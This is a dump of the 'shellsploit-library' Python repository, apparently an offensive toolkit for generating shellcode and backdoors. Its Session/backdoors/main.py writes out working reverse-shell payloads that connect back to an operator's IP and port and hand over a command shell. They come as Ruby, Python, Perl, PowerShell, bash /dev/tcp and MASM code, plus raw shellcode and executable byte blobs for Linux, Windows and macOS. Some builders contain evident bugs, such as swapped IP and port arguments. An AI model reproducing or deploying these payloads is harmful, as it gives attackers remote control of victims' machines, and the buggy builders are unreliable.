├── .gitignore ├── LICENSE ├── README.md ├── __init__.py ├── lib ├── __init__.py ├── base │ ├── __init__.py │ └── framework.py ├── core │ ├── __init__.py │ ├── base.py │ └── commands.py └── payloads │ ├── __init__.py │ ├── disassembly.py │ └── shellcode.py ├── setup.py └── shellsploit ├── Session ├── __init__.py ├── backdoors │ ├── __init__.py │ └── main.py ├── encryption.py ├── generator.py └── netcat.py ├── __init__.py ├── core ├── __init__.py └── backdoors.py ├── database ├── FreeBSDx64 │ ├── __init__.py │ ├── bin_sh.py │ ├── execc.py │ ├── reverse_tcp.py │ └── tcp_bind.py ├── FreeBSDx86 │ ├── __init__.py │ ├── bin_sh.py │ ├── execc.py │ ├── read.py │ ├── reverse_tcp.py │ ├── reverse_tcp2.py │ └── tcp_bind.py ├── Linux │ ├── __init__.py │ └── magic.py ├── Linux64 │ ├── __init__.py │ ├── bin_shx64.py │ ├── chmod.py │ ├── readfilex64.py │ ├── reverse_tcpx64.py │ └── tcp_bindx64.py ├── Linux86 │ ├── __init__.py │ ├── bin_shx86.py │ ├── chmod.py │ ├── download.py │ ├── execc.py │ ├── readfilex86.py │ ├── reverse_tcpx86.py │ └── tcp_bindx86.py ├── LinuxARM │ ├── __init__.py │ ├── bin_sh.py │ ├── chmod.py │ ├── execc.py │ └── reverse_tcp.py ├── LinuxMIPS │ ├── __init__.py │ ├── bin_sh.py │ ├── chmod.py │ ├── reverse_tcp.py │ └── tcp_bind.py ├── OSX64 │ ├── __init__.py │ ├── bin_sh.py │ ├── reverse_tcp.py │ └── tcp_bind.py ├── OSX86 │ ├── __init__.py │ ├── bin_sh.py │ ├── reverse_tcp.py │ └── tcp_bind.py ├── Solarisx86 │ ├── __init__.py │ ├── bin_sh.py │ ├── read.py │ ├── reverse_tcp.py │ └── tcp_bind.py ├── Windows │ ├── __init__.py │ ├── bind_tcp.py │ ├── downloadandexecute.py │ ├── execc.py │ ├── messagebox.py │ ├── rev_tcp.py │ └── xor.py ├── __init__.py ├── generator.py └── stackconvert.py ├── disassembly ├── Syscalls │ ├── __init__.py │ ├── freebsd_32.py │ ├── linux_32.py │ ├── linux_64.py │ ├── openbsd_32.py │ └── solaris_32.py ├── __init__.py ├── capstoneheader.py ├── dis.py └── dis2.py └── encoders ├── __init__.py ├── py ├── __init__.py ├── payloads.py ├── pyminifier │ ├── __init__.py │ ├── analyze.py │ ├── compression.py │ ├── hero.py │ ├── minification.py │ ├── obfuscate.py │ ├── opt.py │ └── token_utils.py └── starter.py └── shellcode ├── __init__.py ├── payloads.py ├── starter.py ├── xor.py └── xor_b3m.py /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | *.pyo 3 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2016 Mnemosyne 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | #shellsploit-library 2 | 3 | 4 | Python library for shellsploit-framework(https://github.com/b3mb4m/shellsploit-framework) project. 5 | 6 | 7 | #Usage 8 | ---------- 9 | 10 | import shellsploit 11 | 12 | shellsploit = shellsploit.Engine() 13 | 14 | #Create shellcode 15 | shellcode = shellsploit.shellcode("linux86/binsh_spawn") 16 | 17 | #Encode it 18 | print shellsploit.encode("x86/xor", 1, shellcode) 19 | 20 | 21 | #Donate 22 | -------- 23 | 24 | ![alt tag](http://i.hizliresim.com/QQ85a3.png) 25 | 26 | 27 | 1HzaA1dyH2Hn57VnSBw6THw8kWo2diWvFF 28 | 29 | 30 | 31 | #Bugs/Requests 32 | --------------- 33 | 34 | Please do not forget to report bugs! You can submit an issue, pull request, or you can pm via email, 35 | 36 | 37 | ######b3mb4m@protonmail.com 38 | -------------------------------------------------------------------------------- /__init__.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# -------------------------------------------------------------------------------- /lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/lib/__init__.py -------------------------------------------------------------------------------- /lib/base/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/lib/base/__init__.py -------------------------------------------------------------------------------- /lib/base/framework.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | from lib.core.base import Base 10 | from lib.payloads.shellcode import Shellcode 11 | 12 | 13 | class ShellsploitFramework(Base, Shellcode): 14 | 15 | def __init__(self): 16 | super(Base, self).__init__() 17 | super(Shellcode, self).__init__() 18 | -------------------------------------------------------------------------------- /lib/core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/lib/core/__init__.py -------------------------------------------------------------------------------- /lib/core/base.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | from commands import Commands 10 | 11 | 12 | class Base(Commands): 13 | def __init__(self): 14 | Commands.__init__(self) 15 | 16 | @staticmethod 17 | def dynamicimport( script): 18 | "return a function or class" 19 | import importlib 20 | return importlib.import_module( script) 21 | 22 | 23 | @staticmethod 24 | def binary2hex( binary): 25 | "convert binary to hexdecimal" 26 | import binascii 27 | return binascii.hexlify(binary) 28 | 29 | -------------------------------------------------------------------------------- /lib/core/commands.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | class Commands(object): 10 | def IP(self): 11 | from urllib2 import urlopen 12 | from re import findall 13 | 14 | lists = [ 15 | "http://www.get-ip.me/", 16 | "http://checkip.dyndns.org/", 17 | "http://whatsmyip.net/", 18 | "http://mxtoolbox.com/WhatIsMyIP/", 19 | ] 20 | 21 | for x in lists: 22 | try: 23 | data = urlopen(x, timeout=2).read() 24 | grab = findall('([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)', data) 25 | ip = grab[0] 26 | break 27 | except: 28 | pass 29 | 30 | if len(ip) < 0: 31 | return "NAT IP Not founded." 32 | else: 33 | nat = "IP : %s\t-NAT" % ip 34 | self.localIP( nat) 35 | 36 | 37 | def localIP(self, natip): 38 | #http://stackoverflow.com/questions/166506/finding-local-ip-addresses-using-pythons-stdlib 39 | import socket 40 | print ("\n"+natip) 41 | try: 42 | print ("IP : {0}\t-Local".format([l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0])) 43 | except: 44 | print ("Local IP Not founded.") 45 | print ("") 46 | 47 | 48 | @staticmethod 49 | def clean(): 50 | from os import name,system 51 | if name == "nt": 52 | return system('cls') 53 | else: 54 | return system('clear') 55 | 56 | 57 | @staticmethod 58 | def pids( check=None, name=None): 59 | #It currently supports Linux, Windows, OSX, FreeBSD and Sun Solaris, 60 | #both 32-bit and 64-bit architectures, with Python versions from 2.6 to 3.5 61 | #(users of Python 2.4 and 2.5 may use 2.1.3 version). 62 | from psutil import process_iter 63 | 64 | if check == "wholelist": 65 | print ("") 66 | for p in process_iter(): 67 | try: 68 | print ('\tPID: {0} \t\t {1}'.format(p.pid,p.name())) 69 | except: 70 | pass 71 | print ("") 72 | 73 | else: 74 | cache = None 75 | print ("") 76 | for p in process_iter(): 77 | try: 78 | if name.lower() in p.name().lower(): 79 | cache = True 80 | print ('\tPID: {0} \t\t {1}'.format(p.pid,p.name())) 81 | except: 82 | pass 83 | print ("") 84 | if cache == None: 85 | print ("PID not founded for : {0} ".format(name)) 86 | 87 | 88 | @staticmethod 89 | def oscommand( command): 90 | from os import system 91 | try: 92 | print ("") 93 | system( command) 94 | except Exception as error: 95 | return "Unexpected error : %s " % error 96 | 97 | 98 | @staticmethod 99 | def web2ip( target): 100 | import socket 101 | try: 102 | return socket.gethostbyname(target) 103 | except Exception as error: 104 | return "Unexpected error : %s " % error 105 | 106 | 107 | @staticmethod 108 | def exit( out=None): 109 | from sys import exit 110 | return exit( out) if out else exit() 111 | 112 | 113 | 114 | 115 | 116 | 117 | -------------------------------------------------------------------------------- /lib/payloads/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/lib/payloads/__init__.py -------------------------------------------------------------------------------- /lib/payloads/disassembly.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | class Disassembly(object): 10 | 11 | "Require shellcode format to disassembly \xFF\xFF\xFF\xFF .." 12 | def startdisas(self, shellcode, string): 13 | if string == "None": 14 | print("Shellcode must be generate before disassembly !") 15 | return None 16 | 17 | shellcode = self.getrawhex(shellcode) 18 | if "linux_mips" not in string or "linux_mips" not in string: 19 | from shell.disassembly.dis import disas 20 | 21 | try: 22 | if "64" in string: 23 | print(disas(str(bytearray(shellcode.decode("hex"))), 64)) 24 | elif "86" in string: 25 | print(disas(str(bytearray(shellcode.decode("hex"))), 32)) 26 | else: 27 | print(disas(str(bytearray(shellcode.decode("hex"))), 32)) 28 | except TypeError: 29 | print("Disassembly failed.Please do not forget report.") 30 | 31 | else: 32 | from shell.disassembly.dis2 import disasNOTintel 33 | try: 34 | print("\n\n") 35 | if "mips" in string: 36 | print(disasNOTintel(shellcode.decode("hex"), "mips", 32)) 37 | else: 38 | if "64" in string: 39 | print(disasNOTintel(shellcode.decode("hex"), "arm", 64)) 40 | elif "86" in string: 41 | print(disasNOTintel(shellcode.decode("hex"), "arm", 32)) 42 | print("\n\n") 43 | except TypeError as err: 44 | print("Disassembly failed.Please do not forget report.") 45 | 46 | def getrawhex(self, x): 47 | return x.replace("\\x", "") 48 | -------------------------------------------------------------------------------- /lib/payloads/shellcode.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | from disassembly import Disassembly 10 | 11 | 12 | class Shellcode(Disassembly): 13 | info = { 14 | "author": "", 15 | "credits": "", 16 | "name": "", 17 | "references": "", 18 | "platform": "", 19 | "disclosureDate": "", 20 | "reliability": "", 21 | "rawassembly": "", 22 | "size": "", 23 | "payload": "", 24 | } 25 | 26 | def __init__(self): 27 | Disassembly.__init__(self) 28 | 29 | def getpayload(self): 30 | return Shellcode.info["payload"][0] 31 | 32 | def getsize(self, x): 33 | return len(x.split("\\x")) 34 | 35 | @staticmethod 36 | def prettyout(shellcode): 37 | from re import findall 38 | data = shellcode.replace("\\x", "") 39 | db = [] 40 | print("\n") 41 | for x in [data[x:x + 40] for x in range(0, len(data), 40)]: 42 | db = findall("..?", x) 43 | if data.endswith(x): 44 | print('\t"\\x' + "\\x".join(db) + '"') 45 | else: 46 | print('\t"\\x' + "\\x".join(db) + '"' + ' +') 47 | print("\n") 48 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | from setuptools import setup,find_packages 2 | 3 | 4 | setup( 5 | name = "shellsploit-library", 6 | entry_points={ 7 | 'console_scripts': [ 8 | 'shellsploit = shellsploit', 9 | ] 10 | }, 11 | packages = find_packages(), 12 | version = "0.1", 13 | description = ("An open source cuztomize shellcode,backdoor library"), 14 | author = "B3mB4m", 15 | author_email = "b3mb4m@protonmail.com", 16 | url='https://github.com/b3mb4m/shellsploit-library', 17 | ) -------------------------------------------------------------------------------- /shellsploit/Session/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/Session/__init__.py -------------------------------------------------------------------------------- /shellsploit/Session/backdoors/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/Session/backdoors/__init__.py -------------------------------------------------------------------------------- /shellsploit/Session/backdoors/main.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | def decimaltohex( number): 10 | number = int(number) 11 | list = [] 12 | while number >= 1: 13 | if number % 16 == 10: list.append("a") 14 | elif number % 16 == 11: list.append("b") 15 | elif number % 16 == 12: list.append("c") 16 | elif number % 16 == 13: list.append("d") 17 | elif number % 16 == 14: list.append("e") 18 | elif number % 16 == 15: list.append("e") 19 | else: list.append(str(number % 16)) 20 | number = number / 16 21 | return str("".join(list[::-1])) 22 | 23 | def LPORT( port): 24 | import re 25 | db = [] 26 | fixmesempai = re.findall('..?', decimaltohex(str(port))) 27 | for x in fixmesempai: 28 | if len(x) == 1: 29 | x = "0"+x 30 | db.append(x) 31 | return "\\x"+"\\x".join(db) 32 | 33 | def LIP( ip): 34 | ip = str(ip).split(".") 35 | db = [] 36 | db2 = [] 37 | for x in ip: 38 | db.append(decimaltohex( int(x))) 39 | for x in db: 40 | if len(x) == 1: 41 | x = "0"+x 42 | db2.append(x) 43 | return "\\x"+"\\x".join(db2) 44 | 45 | 46 | def rbreverse_tcp( IP=None, PORT=None): 47 | #https://github.com/secjohn/ruby-shells/blob/master/revshell.rb 48 | #Raw socket connect. 49 | db = """#!/usr/bin/env ruby 50 | require 'socket' 51 | require 'open3' 52 | 53 | RHOST = "%s" 54 | PORT = "%s" 55 | 56 | begin 57 | sock = TCPSocket.new "#{RHOST}", "#{PORT}" 58 | rescue 59 | sleep 20 60 | retry 61 | end 62 | 63 | begin 64 | while line = sock.gets 65 | Open3.popen2e("#{line}") do | stdin, stdout_and_stderr | 66 | IO.copy_stream(stdout_and_stderr, sock) 67 | end 68 | end 69 | rescue 70 | retry 71 | end 72 | """ % (IP,PORT) 73 | return db 74 | 75 | def asmreverse_tcp( IP=None, PORT=None): 76 | #https://github.com/xillwillx/Mini_Reverse_Shell/blob/master/minireverse.asm 77 | db = '''.386 78 | .model flat, stdcall 79 | option casemap:none 80 | include \masm32\include\windows.inc 81 | include \masm32\include\kernel32.inc 82 | include \masm32\include\ws2_32.inc 83 | include \masm32\include\masm32.inc 84 | includelib \masm32\lib\ws2_32.lib 85 | includelib \masm32\lib\kernel32.lib 86 | includelib \masm32\lib\masm32.lib 87 | 88 | .data 89 | cmd db "cmd",0 90 | UrIP db "{0}",0 91 | port db "{1}",0 92 | .data? 93 | sinfo STARTUPINFO<> 94 | pi PROCESS_INFORMATION<> 95 | sin sockaddr_in<> 96 | WSAD WSADATA<> 97 | Wsocket dd ? 98 | .code 99 | start: 100 | invoke WSAStartup, 101h, addr WSAD 101 | invoke WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0 102 | mov Wsocket, eax 103 | mov sin.sin_family, 2 104 | invoke atodw, addr port 105 | invoke htons, eax 106 | mov sin.sin_port, ax 107 | invoke gethostbyname, addr UrIP 108 | mov eax, [eax+12] 109 | mov eax, [eax] 110 | mov eax, [eax] 111 | mov sin.sin_addr, eax 112 | 113 | mov eax,Wsocket 114 | mov sinfo.hStdInput,eax 115 | mov sinfo.hStdOutput,eax 116 | mov sinfo.hStdError,eax 117 | mov sinfo.cb,sizeof STARTUPINFO 118 | mov sinfo.dwFlags,STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES 119 | shellagain: 120 | invoke connect, Wsocket, addr sin , sizeof(sockaddr_in) 121 | invoke CreateProcess,NULL,addr cmd,NULL,NULL,TRUE,8000040h,NULL,NULL,addr sinfo,addr pi 122 | invoke WaitForSingleObject,pi.hProcess,INFINITE 123 | jmp shellagain 124 | ret 125 | end start 126 | '''.format(IP,PORT) 127 | return db 128 | 129 | 130 | def pyreverse_tcp( IP=None, PORT=None): 131 | #Connect back and spawn shell. 132 | padd = 's.connect(("%s",%s))' % (str(IP),str(PORT)) 133 | ret = [ 134 | "import socket,subprocess,os", 135 | "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)", 136 | "", 137 | "os.dup2(s.fileno(),0)", 138 | "os.dup2(s.fileno(),1)", 139 | "os.dup2(s.fileno(),2)", 140 | """p=subprocess.call(["/bin/sh","-i"]);""" 141 | ] 142 | ret[2] = padd 143 | return "\n".join(ret) 144 | 145 | 146 | 147 | def shreverse_tcp( IP=None, PORT=None): 148 | #Connect back and spawn shell. 149 | from random import randint 150 | rand = randint(0, 99) 151 | ret = "0<&%d-;exec %d<>/dev/tcp/%s/%s;sh <&%d >&%d 2>&%d" % (rand,rand,IP,PORT,rand,rand,rand) 152 | return ret 153 | 154 | def plreverse_tcp( IP=None, PORT=None): 155 | #Connect back and spawn shell. 156 | ret = "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::" 157 | padd = 'INET(PeerAddr,"%s:%s");' % (IP,PORT) 158 | ret += padd 159 | ret += "STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'" 160 | return ret 161 | 162 | 163 | def linx86reverse_tcp( IP=None, PORT=None): 164 | shellcode = r"\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0" 165 | shellcode += r"\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68" 166 | shellcode += LIP(IP) 167 | shellcode += r"\x66\x68" 168 | shellcode += LPORT(PORT) 169 | shellcode += r"\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1" 170 | shellcode += r"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" 171 | byteman = "7f454c4601010100000000000000000002000300010000005480040" 172 | byteman += "834000000000000000000000034002000010000000000000001000" 173 | byteman += "0000000000000800408008004089c000000001000000700000000100000" 174 | byteman = byteman+shellcode.replace(r"\x", "") 175 | return byteman 176 | 177 | 178 | #BETA, need test. 179 | def winreverse_tcp( IP=None, PORT=None): 180 | huuha = "4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010200002179560000000000000000e0000f030b010238000200000002000000000000001000000010000000000000000040000010000000020000040000000100000004000000000000000030000000040000383f00000300000000002000001000000000100000100000000000001000000000000000000000000020000014000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e746578740000001a000000001000000002000000040000000000000000000000000000200000602e6964617461000014000000002000000002000000060000000000000000000000000000400000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 181 | 182 | #That payload get from metasploit.com 183 | byteman = r"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" 184 | byteman += r"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" 185 | byteman += r"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" 186 | byteman += r"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" 187 | byteman += r"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" 188 | byteman += r"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" 189 | byteman += r"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" 190 | byteman += r"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" 191 | byteman += r"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" 192 | byteman += r"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" 193 | byteman += r"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" 194 | byteman += r"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" 195 | byteman += r"\x00\xff\xd5\x6a\x05\x68" 196 | byteman += LIP( PORT) 197 | byteman += r"\x68\x02\x00" 198 | byteman += LPORT(PORT) 199 | byteman += r"\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" 200 | byteman += r"\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61" 201 | byteman += r"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5" 202 | byteman += r"\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8" 203 | byteman += r"\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a" 204 | byteman += r"\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53" 205 | byteman += r"\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee" 206 | byteman += r"\xc3" 207 | 208 | huuha += byteman.replace(r"\x", "") 209 | huuha += "ffffffff00000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 210 | return huuha 211 | 212 | def macosx86reverse_tcp( IP=None, PORT=None): 213 | byteman = r"\x68" 214 | byteman += LIP( IP) 215 | byteman += r"\x68\xff\x02" 216 | byteman += LPORT( PORT) 217 | byteman += r"\x89\xe7\x31\xc0\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80" 218 | byteman += r"\x57\x50\x50\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff" 219 | byteman += r"\x4f\xe8\x79\xf6\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89" 220 | byteman += r"\xe3\x50\x54\x54\x53\x50\xb0\x3b\xcd\x80" 221 | return byteman.replace(r"\x", "") 222 | 223 | def linx64reverse_tcp( IP=None, PORT=None): 224 | shellcode = "7f454c4602010100000000000000000002003e000100000080004000000000004000000000000000b0000000000000000000000040003800010040000300020001000000050000000000000000000000000040000000000000004000000000009f000000000000009f0000000000000000002000000000000000000000000000" 225 | padd = r"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" 226 | padd += r"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" 227 | padd += r"\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02" 228 | padd += LIP(PORT) 229 | padd += r"\xc7\x44\x24\x04" 230 | padd += LPORT(IP) 231 | padd += r"\x48\x89\xe6\x6a\x10" 232 | padd += r"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" 233 | padd += r"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" 234 | padd += r"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" 235 | padd += r"\x5f\x6a\x3b\x58\x0f\x05" 236 | shellcode += padd.replace("\n", "") 237 | shellcode += "5002e7368737472746162002e7465787400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000600000000000000800040000000000080000000000000001f000000000000000000000000000000100000000000000000000000000000000100000003000000000000000000000000000000000000009f000000000000001100000000000000000000000000000001000000000000000000000000000000" 238 | return shellcode 239 | 240 | 241 | def powershell( ip,port): 242 | db = ["" for x in range(8)] 243 | payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%s)' % (ip,port) 244 | db[0] = payload 245 | db[1] = '$stream = $client.GetStream()' 246 | db[2] = '[byte[]]$bytes = 0..255|%{0}' 247 | db[3] = 'while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){' 248 | db[4] = '$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)' 249 | db[5] = '$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> "' 250 | db[6] = '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length)' 251 | db[7] = '$stream.Flush()};$client.Close()' 252 | return ";".join(db) 253 | -------------------------------------------------------------------------------- /shellsploit/Session/encryption.py: -------------------------------------------------------------------------------- 1 | #-*- coding: utf-8 -*- 2 | #------------------Bombermans Team---------------------------------# 3 | # Author : B3mB4m 4 | # Concat : b3mb4m@protonmail.com 5 | # Project : https://github.com/b3mb4m/Shellsploit 6 | # LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 7 | #------------------------------------------------------------------# 